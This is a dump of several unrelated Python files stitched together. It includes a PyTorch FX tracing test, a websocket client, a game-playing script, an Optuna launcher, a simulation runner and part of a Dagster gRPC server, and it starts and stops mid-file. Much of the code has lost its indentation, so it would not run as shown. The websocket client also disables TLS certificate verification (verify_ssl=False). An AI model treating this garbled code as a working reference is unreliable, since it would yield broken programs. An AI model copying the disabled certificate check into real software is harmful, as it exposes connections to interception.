"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
"normalize" : MUTABLE,
}
    # List of nn.functional functions that take Tensor inputs but lack type annotations
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable object like modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
                # The object has no inspectable signature or is otherwise not supported
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 10):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
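        # Patch the has_torch_function* helpers to always return False for these tests (restored in
        # tearDownClass), so calls inside torch.nn.functional do not take the handle_torch_function
        # branch while being traced.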
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
def setUp(self):
        # Checking for mutable operations while tracing is feature-flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
RuntimeError,
r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)
UNTRACEABLE_MODELS = {
"fasterrcnn_resnet50_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
"maskrcnn_resnet50_fpn": PROXY_ITERATED,
"keypointrcnn_resnet50_fpn": PROXY_ITERATED,
"retinanet_resnet50_fpn": PROXY_ITERATED,
}
UNSCRIPTABLE_MODELS = {
"googlenet": INCONSISTENT_TYPE,
"inception_v3": INCONSISTENT_TYPE,
}
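    # Some torchvision models return dicts or tuples rather than a single tensor; these lambdas
    # extract the value that should be compared between the eager and traced models.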
output_transform = {
"fcn_resnet50": lambda x: x["out"],
"fcn_resnet101": lambda x: x["out"],
"deeplabv3_resnet50": lambda x: x["out"],
"deeplabv3_resnet101": lambda x: x["out"],
"deeplabv3_mobilenet_v3_large": lambda x: x["out"],
"lraspp_mobilenet_v3_large": lambda x: x["out"],
"fasterrcnn_resnet50_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
"maskrcnn_resnet50_fpn": lambda x: x[1],
"keypointrcnn_resnet50_fpn": lambda x: x[1],
"retinanet_resnet50_fpn": lambda x: x[1],
}
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
def run_test(self):
model = model_fn(**kwargs)
model = model.eval()
if name in self.UNTRACEABLE_MODELS:
                exc, err = self.UNTRACEABLE_MODELS[name]
                with self.assertRaisesRegex(exc, err):
graph = symbolic_trace(model)
else:
out_transform = self.output_transform.get(name, lambda x: x)
graph : torch.fx.GraphModule = symbolic_trace(model)
a = out_transform(model(x))
b = out_transform(graph(x))
self.assertEqual(a, b)
if name in self.UNSCRIPTABLE_MODELS:
                    exc, err = self.UNSCRIPTABLE_MODELS[name]
                    with self.assertRaisesRegex(exc, err):
script = torch.jit.script(graph)
else:
script = torch.jit.script(graph)
c = out_transform(script(x))
self.assertEqual(a, c)
return run_test
@classmethod
def generate_classification_tests(cls):
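        # Public lowercase callables in torchvision.models are the model factory functions;
        # generate one tracing test per model.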
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
if HAS_TORCHVISION:
TestVisionTracing.generate_tests()
if __name__ == '__main__':
run_tests()
|
websocket_client.py
|
import json
import sys
import traceback
from datetime import datetime
from types import coroutine
from threading import Thread
from asyncio import (
get_event_loop,
set_event_loop,
run_coroutine_threadsafe,
AbstractEventLoop
)
from aiohttp import ClientSession, ClientWebSocketResponse
class WebsocketClient:
"""
针对各类Websocket API的异步客户端
* 重载unpack_data方法来实现数据解包逻辑
* 重载on_connected方法来实现连接成功回调处理
* 重载on_disconnected方法来实现连接断开回调处理
* 重载on_packet方法来实现数据推送回调处理
* 重载on_error方法来实现异常捕捉回调处理
"""
def __init__(self):
"""Constructor"""
self._active: bool = False
self._host: str = ""
self._session: ClientSession = ClientSession()
self._ws: ClientWebSocketResponse = None
self._loop: AbstractEventLoop = None
self._proxy: str = ""
        self._ping_interval: int = 60  # seconds
self._header: dict = {}
self._last_sent_text: str = ""
self._last_received_text: str = ""
def init(
self,
host: str,
proxy_host: str = "",
proxy_port: int = 0,
ping_interval: int = 60,
header: dict = None
):
"""
初始化客户端
"""
self._host = host
self._ping_interval = ping_interval
if header:
self._header = header
if proxy_host and proxy_port:
self._proxy = f"http://{proxy_host}:{proxy_port}"
def start(self):
"""
启动客户端
连接成功后会自动调用on_connected回调函数,
请等待on_connected被调用后,再发送数据包。
"""
self._active = True
if not self._loop:
self._loop = get_event_loop()
start_event_loop(self._loop)
run_coroutine_threadsafe(self._run(), self._loop)
def stop(self):
"""
停止客户端。
"""
self._active = False
if self._ws:
coro = self._ws.close()
run_coroutine_threadsafe(coro, self._loop)
if self._loop and self._loop.is_running():
self._loop.stop()
def join(self):
"""
等待后台线程退出。
"""
pass
def send_packet(self, packet: dict):
"""
发送数据包字典到服务器。
如果需要发送非json数据,请重载实现本函数。
"""
if self._ws:
text: str = json.dumps(packet)
self._record_last_sent_text(text)
coro: coroutine = self._ws.send_str(text)
run_coroutine_threadsafe(coro, self._loop)
def unpack_data(self, data: str):
"""
对字符串数据进行json格式解包
如果需要使用json以外的解包格式,请重载实现本函数。
"""
return json.loads(data)
    def on_connected(self):
        """Callback invoked when the connection is established."""
        pass
    def on_disconnected(self):
        """Callback invoked when the connection is closed."""
        pass
    def on_packet(self, packet: dict):
        """Callback invoked when a data packet is received."""
        pass
def on_error(
self,
exception_type: type,
exception_value: Exception,
tb
) -> None:
"""触发异常回调"""
try:
print("WebsocketClient on error" + "-" * 10)
print(self.exception_detail(exception_type, exception_value, tb))
except Exception:
traceback.print_exc()
def exception_detail(
self,
exception_type: type,
exception_value: Exception,
tb
) -> str:
"""异常信息格式化"""
text = "[{}]: Unhandled WebSocket Error:{}\n".format(
datetime.now().isoformat(), exception_type
)
text += "LastSentText:\n{}\n".format(self._last_sent_text)
text += "LastReceivedText:\n{}\n".format(self._last_received_text)
text += "Exception trace: \n"
text += "".join(
traceback.format_exception(exception_type, exception_value, tb)
)
return text
async def _run(self):
"""
在事件循环中运行的主协程
"""
while self._active:
# 捕捉运行过程中异常
try:
# 发起Websocket连接
self._ws = await self._session.ws_connect(
self._host,
proxy=self._proxy,
verify_ssl=False
)
                # Invoke the connected callback
                self.on_connected()
                # Continuously process received data
async for msg in self._ws:
text: str = msg.data
self._record_last_received_text(text)
data: dict = self.unpack_data(text)
self.on_packet(data)
                # Remove the Websocket connection object
                self._ws = None
                # Invoke the disconnected callback
                self.on_disconnected()
            # Handle any captured exception
except Exception:
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
    def _record_last_sent_text(self, text: str):
        """Record the most recently sent text (truncated to 1000 characters)."""
        self._last_sent_text = text[:1000]
    def _record_last_received_text(self, text: str):
        """Record the most recently received text (truncated to 1000 characters)."""
        self._last_received_text = text[:1000]
def start_event_loop(loop: AbstractEventLoop) -> None:
    """Start the event loop."""
    # If the event loop is not running, run it in a background daemon thread
if not loop.is_running():
thread = Thread(target=run_event_loop, args=(loop,))
thread.daemon = True
thread.start()
def run_event_loop(loop: AbstractEventLoop) -> None:
"""运行事件循环"""
set_event_loop(loop)
loop.run_forever()
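# Minimal usage sketch (illustrative only, not part of the original module): subclass
# WebsocketClient and override the callbacks documented in the class docstring. The endpoint
# URL and packet contents below are placeholders.
if __name__ == "__main__":
    import time
    class DemoClient(WebsocketClient):
        def on_connected(self):
            print("connected")
            self.send_packet({"op": "ping"})
        def on_packet(self, packet: dict):
            print("received:", packet)
    client = DemoClient()
    client.init(host="wss://example.com/ws", ping_interval=30)
    client.start()
    time.sleep(10)  # keep the main thread alive while the daemon event-loop thread runs
    client.stop()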
|
part2.py
|
#!/usr/bin/env python3
import sys
from program import Program
from game import Game
import threading
import os
from time import sleep
SLEEP_DURATION = 0.01
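# Simple follow-the-ball policy: on every tick, step the paddle toward the ball's x position.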
def play(game):
while True:
game.update_state()
os.system("clear")
game.display()
if not game.is_running():
break
ball = game.get_ball_pos()
cursor = game.get_cursor_pos()
print(ball)
print(cursor)
if ball[0] > cursor[0]:
print("Move right")
game.move_right()
elif ball[0] < cursor[0]:
print("Move left")
game.move_left()
else:
print("Dont move")
game.dont_move()
sleep(SLEEP_DURATION)
def main():
data = sys.stdin.readline()
g = Game(Program(data, 1))
threads = [
threading.Thread(target=g.execute),
threading.Thread(target=lambda: play(g)),
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == "__main__":
main()
|
optimize.py
|
import argparse
import importlib.util
import os.path
import configparser
import optuna
from threading import Thread
from train.instantiate import *
from train.train import train
from multiprocessing import Process
from train.metrics import Accuracy
from dataset.mnist import get_mnist
import torch
parser = argparse.ArgumentParser(description='Quant tools Optimizer')
parser.add_argument('-j', '--jobs', type=int, default=4, metavar='j',
                    help='Threads to launch for this training')
parser.add_argument('-n', '--n_trials', type=int, default=7, metavar='n',
                    help='Number of trials to compute')
parser.add_argument('--gpus', type=str, default="",
                    help='gpus used for training - e.g. 0,1,3 or 2')
parser.add_argument("-c", "--config_file", type=str, default="./config/optimize.conf", )
parser.add_argument("study_name", type=str, help="Study name to use for this optim")
parser.add_argument("model", type=str, help="Path to the model")
args = parser.parse_args()
# TODO: check whether the model name is in the template folder.
# Load model
spec = importlib.util.spec_from_file_location(os.path.split(args.model)[-1], args.model)
model = importlib.util.module_from_spec(spec)
spec.loader.exec_module(model)
# Load config parser
#config = configparser.ConfigParser()
#config.read(args.config_file)
# Set up the work to do per job
worker = [{"device": None, "n_trials": args.n_trials // args.jobs} for _ in range(args.jobs)]
# Distribute the remaining trials, one extra per job
for index in range(args.n_trials % args.jobs):
    worker[index]["n_trials"] += 1
# Setup device
if args.gpus =="":
# If no gpu setup only use cpu
for work in worker:
work["device"] = "cpu"
else:
gpus = args.gpus.split(",")
for index, work in enumerate(worker):
work["device"] = "cuda:{}".format(gpus[index%(len(gpus))])
def thread_main(device, nb_trial, job_index):
os.execlp("python3","python3","./utils/jobs/optimize.py", str(device), str(nb_trial), str(job_index), args.model, args.study_name)
jobs = [ Process(target=thread_main, args=(worker[index]["device"],worker[index]["n_trials"], index)) for index in range(args.jobs)]
for job in jobs:
job.start()
for job in jobs:
job.join()
"""
def thread_main(device, nb_trial, job_index):
def objectif(trial):
net = instantiate_model(model.Model, trial=trial)
data_params, opti_params = get_opti_from_model(model.Model, trial)
batch_size = data_params.get("batch_size",128)
valid_ratio = data_params.get("valid_ratio", 0.2)
max_epoch = data_params.get("epoch", 20)
learning_rate = opti_params.get("lr", 0.01)
decay_lr = opti_params.get("decay_lr", 0)
optimizer = opti_params.get("optimizer", torch.optim.Adam)
train_set, valid_set, _ = get_mnist(batch_size=batch_size, valid_ratio=valid_ratio, directory="/tmp/MNIST", transform_both=None, transform_train=None, transform_valid=None)
scheduled_lr = [learning_rate*((1-decay_lr)**index) for index in range(20)]
scheduled_opti_conf = {}
for index, lr in enumerate(scheduled_lr):
scheduled_opti_conf[index] = {"lr":lr}
print(scheduled_opti_conf)
print(device)
train(net, train_set, valid_set, device=device, save_path="/tmp/Optimize/job_{}".format(job_index), early_stopping=False,
opti=optimizer, loss=torch.nn.CrossEntropyLoss(), max_epoch=max_epoch,
static_opti_conf=None, scheduled_opti_conf=scheduled_opti_conf, accuracy_method=Accuracy(10))
return 0
study = optuna.create_study(study_name=args.study_name, load_if_exists=True)
study.optimize(objectif, n_trials=nb_trial)
jobs = [ Process(target=thread_main, args=(worker[index]["device"],worker[index]["n_trials"], index)) for index in range(args.jobs)]
for job in jobs:
job.start()
for job in jobs:
job.join()
"""
|
analysis.py
|
import math
import os
import sys
import time
from multiprocessing import Queue, Process, freeze_support
from predictor import Predictor, SingleSimPredictor
"""
Class responsible for simulation start over list of input files.
"""
class Analysis:
"""
args - collection of input arguments by argparse
"""
def __init__(self, args):
self._args = args
self._solutions = self.__collectSolutions()
"""
returns a list of solution objects
"""
def __collectSolutions(self):
solutions = []
for bnx in self._args.files:
if self._args.single_sim:
solutions.append(SingleSimPredictor(bnx, self._args))
else:
solutions.append(Predictor(bnx, self._args))
return solutions
"""
Starts simulation for each input file as a separate process.
"""
def store(self):
procs = []
for solution in self._solutions:
p = Process(target=solution.store)
procs.append((p,solution))
for p,s in procs:
p.start()
if self._args.verbose:
print("Solution %s started." % s.bnx())
for p,s in procs:
p.join()
if self._args.verbose:
print("Solution %s finished." % s.bnx())
print("Analysis finished!")
|
server.py
|
import math
import os
import queue
import sys
import threading
import time
import uuid
from collections import namedtuple
from concurrent.futures import ThreadPoolExecutor
import grpc
from dagster import check, seven
from dagster.core.code_pointer import CodePointer
from dagster.core.definitions.reconstructable import (
ReconstructableRepository,
repository_def_from_target_def,
)
from dagster.core.host_representation import ExternalPipelineOrigin, ExternalRepositoryOrigin
from dagster.core.host_representation.external_data import external_repository_data_from_def
from dagster.core.instance import DagsterInstance
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.serdes import (
deserialize_json_to_dagster_namedtuple,
serialize_dagster_namedtuple,
whitelist_for_serdes,
)
from dagster.serdes.ipc import (
IPCErrorMessage,
ipc_write_stream,
open_ipc_subprocess,
read_unary_response,
)
from dagster.seven import multiprocessing
from dagster.utils import find_free_port, safe_tempfile_path_unmanaged
from dagster.utils.error import serializable_error_info_from_exc_info
from grpc_health.v1 import health, health_pb2, health_pb2_grpc
from .__generated__ import api_pb2
from .__generated__.api_pb2_grpc import DagsterApiServicer, add_DagsterApiServicer_to_server
from .impl import (
RunInSubprocessComplete,
StartRunInSubprocessSuccessful,
get_external_execution_plan_snapshot,
get_external_pipeline_subset_result,
get_external_schedule_execution,
get_external_sensor_execution,
get_partition_config,
get_partition_names,
get_partition_set_execution_param_data,
get_partition_tags,
start_run_in_subprocess,
)
from .types import (
CanCancelExecutionRequest,
CanCancelExecutionResult,
CancelExecutionRequest,
CancelExecutionResult,
ExecuteExternalPipelineArgs,
ExecutionPlanSnapshotArgs,
ExternalScheduleExecutionArgs,
GetCurrentImageResult,
ListRepositoriesResponse,
LoadableRepositorySymbol,
PartitionArgs,
PartitionNamesArgs,
PartitionSetExecutionParamArgs,
PipelineSubsetSnapshotArgs,
SensorExecutionArgs,
ShutdownServerResult,
StartRunResult,
)
from .utils import get_loadable_targets
EVENT_QUEUE_POLL_INTERVAL = 0.1
CLEANUP_TICK = 0.5
STREAMING_EXTERNAL_REPOSITORY_CHUNK_SIZE = 4000000
class CouldNotBindGrpcServerToAddress(Exception):
pass
class LazyRepositorySymbolsAndCodePointers:
"""Enables lazily loading user code at RPC-time so that it doesn't interrupt startup and
we can gracefully handle user code errors."""
def __init__(self, loadable_target_origin):
self._loadable_target_origin = loadable_target_origin
self._loadable_repository_symbols = None
self._code_pointers_by_repo_name = None
def load(self):
self._loadable_repository_symbols = load_loadable_repository_symbols(
self._loadable_target_origin
)
self._code_pointers_by_repo_name = build_code_pointers_by_repo_name(
self._loadable_target_origin, self._loadable_repository_symbols
)
@property
def loadable_repository_symbols(self):
if self._loadable_repository_symbols is None:
self.load()
return self._loadable_repository_symbols
@property
def code_pointers_by_repo_name(self):
if self._code_pointers_by_repo_name is None:
self.load()
return self._code_pointers_by_repo_name
def load_loadable_repository_symbols(loadable_target_origin):
if loadable_target_origin:
loadable_targets = get_loadable_targets(
loadable_target_origin.python_file,
loadable_target_origin.module_name,
loadable_target_origin.package_name,
loadable_target_origin.working_directory,
loadable_target_origin.attribute,
)
return [
LoadableRepositorySymbol(
attribute=loadable_target.attribute,
repository_name=repository_def_from_target_def(
loadable_target.target_definition
).name,
)
for loadable_target in loadable_targets
]
else:
return []
def build_code_pointers_by_repo_name(loadable_target_origin, loadable_repository_symbols):
repository_code_pointer_dict = {}
for loadable_repository_symbol in loadable_repository_symbols:
if loadable_target_origin.python_file:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_file(
loadable_target_origin.python_file,
loadable_repository_symbol.attribute,
loadable_target_origin.working_directory,
)
elif loadable_target_origin.package_name:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_package(
loadable_target_origin.package_name, loadable_repository_symbol.attribute,
)
else:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_module(
loadable_target_origin.module_name, loadable_repository_symbol.attribute,
)
return repository_code_pointer_dict
class DagsterApiServer(DagsterApiServicer):
    # The loadable_target_origin is currently Noneable to support instantiating a server.
# This helps us test the ping methods, and incrementally migrate each method to
# the target passed in here instead of passing in a target in the argument.
def __init__(
self,
server_termination_event,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
super(DagsterApiServer, self).__init__()
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
self._server_termination_event = check.inst_param(
server_termination_event, "server_termination_event", seven.ThreadingEventType
)
self._loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
# Each server is initialized with a unique UUID. This UUID is used by clients to track when
# servers are replaced and is used for cache invalidation and reloading.
self._server_id = check.opt_str_param(fixed_server_id, "fixed_server_id", str(uuid.uuid4()))
        # The client tells the server to shut down by calling ShutdownServer (or by failing to send
        # a heartbeat), at which point this event is set. The cleanup thread will then set the
        # server termination event once all current executions have finished, which stops the server.
self._shutdown_once_executions_finish_event = threading.Event()
# Dict[str, (multiprocessing.Process, DagsterInstance)]
self._executions = {}
# Dict[str, multiprocessing.Event]
self._termination_events = {}
self._termination_times = {}
self._execution_lock = threading.Lock()
self._repository_symbols_and_code_pointers = LazyRepositorySymbolsAndCodePointers(
loadable_target_origin
)
if not lazy_load_user_code:
self._repository_symbols_and_code_pointers.load()
self.__last_heartbeat_time = time.time()
if heartbeat:
self.__heartbeat_thread = threading.Thread(
target=self._heartbeat_thread,
args=(heartbeat_timeout,),
name="grpc-server-heartbeat",
)
self.__heartbeat_thread.daemon = True
self.__heartbeat_thread.start()
else:
self.__heartbeat_thread = None
self.__cleanup_thread = threading.Thread(
target=self._cleanup_thread, args=(), name="grpc-server-cleanup"
)
self.__cleanup_thread.daemon = True
self.__cleanup_thread.start()
def cleanup(self):
if self.__heartbeat_thread:
self.__heartbeat_thread.join()
self.__cleanup_thread.join()
def _heartbeat_thread(self, heartbeat_timeout):
while True:
self._shutdown_once_executions_finish_event.wait(heartbeat_timeout)
if self._shutdown_once_executions_finish_event.is_set():
break
if self.__last_heartbeat_time < time.time() - heartbeat_timeout:
self._shutdown_once_executions_finish_event.set()
def _cleanup_thread(self):
while True:
self._server_termination_event.wait(CLEANUP_TICK)
if self._server_termination_event.is_set():
break
self._check_for_orphaned_runs()
def _check_for_orphaned_runs(self):
with self._execution_lock:
runs_to_clear = []
for run_id, (process, instance_ref) in self._executions.items():
if not process.is_alive():
with DagsterInstance.from_ref(instance_ref) as instance:
runs_to_clear.append(run_id)
run = instance.get_run_by_id(run_id)
if not run or run.is_finished:
continue
# the process died in an unexpected manner. inform the system
message = "Pipeline execution process for {run_id} unexpectedly exited.".format(
run_id=run.run_id
)
instance.report_engine_event(message, run, cls=self.__class__)
instance.report_run_failed(run)
for run_id in runs_to_clear:
self._clear_run(run_id)
# Once there are no more running executions after we have received a request to
# shut down, terminate the server
if self._shutdown_once_executions_finish_event.is_set():
if len(self._executions) == 0:
self._server_termination_event.set()
# Assumes execution lock is being held
def _clear_run(self, run_id):
del self._executions[run_id]
del self._termination_events[run_id]
if run_id in self._termination_times:
del self._termination_times[run_id]
def _recon_repository_from_origin(self, external_repository_origin):
check.inst_param(
external_repository_origin, "external_repository_origin", ExternalRepositoryOrigin,
)
return ReconstructableRepository(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name[
external_repository_origin.repository_name
],
self._get_current_image(),
)
def _recon_pipeline_from_origin(self, external_pipeline_origin):
check.inst_param(
external_pipeline_origin, "external_pipeline_origin", ExternalPipelineOrigin
)
recon_repo = self._recon_repository_from_origin(
external_pipeline_origin.external_repository_origin
)
return recon_repo.get_reconstructable_pipeline(external_pipeline_origin.pipeline_name)
def Ping(self, request, _context):
echo = request.echo
return api_pb2.PingReply(echo=echo)
def StreamingPing(self, request, _context):
sequence_length = request.sequence_length
echo = request.echo
for sequence_number in range(sequence_length):
yield api_pb2.StreamingPingEvent(sequence_number=sequence_number, echo=echo)
def Heartbeat(self, request, _context):
self.__last_heartbeat_time = time.time()
echo = request.echo
return api_pb2.PingReply(echo=echo)
def GetServerId(self, _request, _context):
return api_pb2.GetServerIdReply(server_id=self._server_id)
def ExecutionPlanSnapshot(self, request, _context):
execution_plan_args = deserialize_json_to_dagster_namedtuple(
request.serialized_execution_plan_snapshot_args
)
check.inst_param(execution_plan_args, "execution_plan_args", ExecutionPlanSnapshotArgs)
recon_pipeline = self._recon_pipeline_from_origin(execution_plan_args.pipeline_origin)
execution_plan_snapshot_or_error = get_external_execution_plan_snapshot(
recon_pipeline, execution_plan_args
)
return api_pb2.ExecutionPlanSnapshotReply(
serialized_execution_plan_snapshot=serialize_dagster_namedtuple(
execution_plan_snapshot_or_error
)
)
def ListRepositories(self, request, _context):
try:
response = ListRepositoriesResponse(
self._repository_symbols_and_code_pointers.loadable_repository_symbols,
executable_path=self._loadable_target_origin.executable_path
if self._loadable_target_origin
else None,
repository_code_pointer_dict=(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name
),
)
except Exception: # pylint: disable=broad-except
response = serializable_error_info_from_exc_info(sys.exc_info())
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(response)
)
def ExternalPartitionNames(self, request, _context):
partition_names_args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_names_args
)
check.inst_param(partition_names_args, "partition_names_args", PartitionNamesArgs)
recon_repo = self._recon_repository_from_origin(partition_names_args.repository_origin)
return api_pb2.ExternalPartitionNamesReply(
serialized_external_partition_names_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_names(recon_repo, partition_names_args.partition_set_name,)
)
)
def ExternalPartitionSetExecutionParams(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_set_execution_param_args
)
check.inst_param(
args, "args", PartitionSetExecutionParamArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalPartitionSetExecutionParamsReply(
serialized_external_partition_set_execution_param_data_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_set_execution_param_data(
recon_repo=recon_repo,
partition_set_name=args.partition_set_name,
partition_names=args.partition_names,
)
)
)
def ExternalPartitionConfig(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(args, "args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalPartitionConfigReply(
serialized_external_partition_config_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_config(recon_repo, args.partition_set_name, args.partition_name)
)
)
def ExternalPartitionTags(self, request, _context):
partition_args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(partition_args, "partition_args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(partition_args.repository_origin)
return api_pb2.ExternalPartitionTagsReply(
serialized_external_partition_tags_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_tags(
recon_repo, partition_args.partition_set_name, partition_args.partition_name
)
)
)
def ExternalPipelineSubsetSnapshot(self, request, _context):
pipeline_subset_snapshot_args = deserialize_json_to_dagster_namedtuple(
request.serialized_pipeline_subset_snapshot_args
)
check.inst_param(
pipeline_subset_snapshot_args,
"pipeline_subset_snapshot_args",
PipelineSubsetSnapshotArgs,
)
return api_pb2.ExternalPipelineSubsetSnapshotReply(
serialized_external_pipeline_subset_result=serialize_dagster_namedtuple(
get_external_pipeline_subset_result(
self._recon_pipeline_from_origin(pipeline_subset_snapshot_args.pipeline_origin),
pipeline_subset_snapshot_args.solid_selection,
)
)
)
def _get_serialized_external_repository_data(self, request):
repository_origin = deserialize_json_to_dagster_namedtuple(
request.serialized_repository_python_origin
)
check.inst_param(repository_origin, "repository_origin", ExternalRepositoryOrigin)
recon_repo = self._recon_repository_from_origin(repository_origin)
return serialize_dagster_namedtuple(
external_repository_data_from_def(recon_repo.get_definition())
)
def ExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
return api_pb2.ExternalRepositoryReply(
serialized_external_repository_data=serialized_external_repository_data,
)
def StreamingExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
num_chunks = int(
math.ceil(
float(len(serialized_external_repository_data))
/ STREAMING_EXTERNAL_REPOSITORY_CHUNK_SIZE
)
)
for i in range(num_chunks):
start_index = i * STREAMING_EXTERNAL_REPOSITORY_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_EXTERNAL_REPOSITORY_CHUNK_SIZE,
len(serialized_external_repository_data),
)
yield api_pb2.StreamingExternalRepositoryEvent(
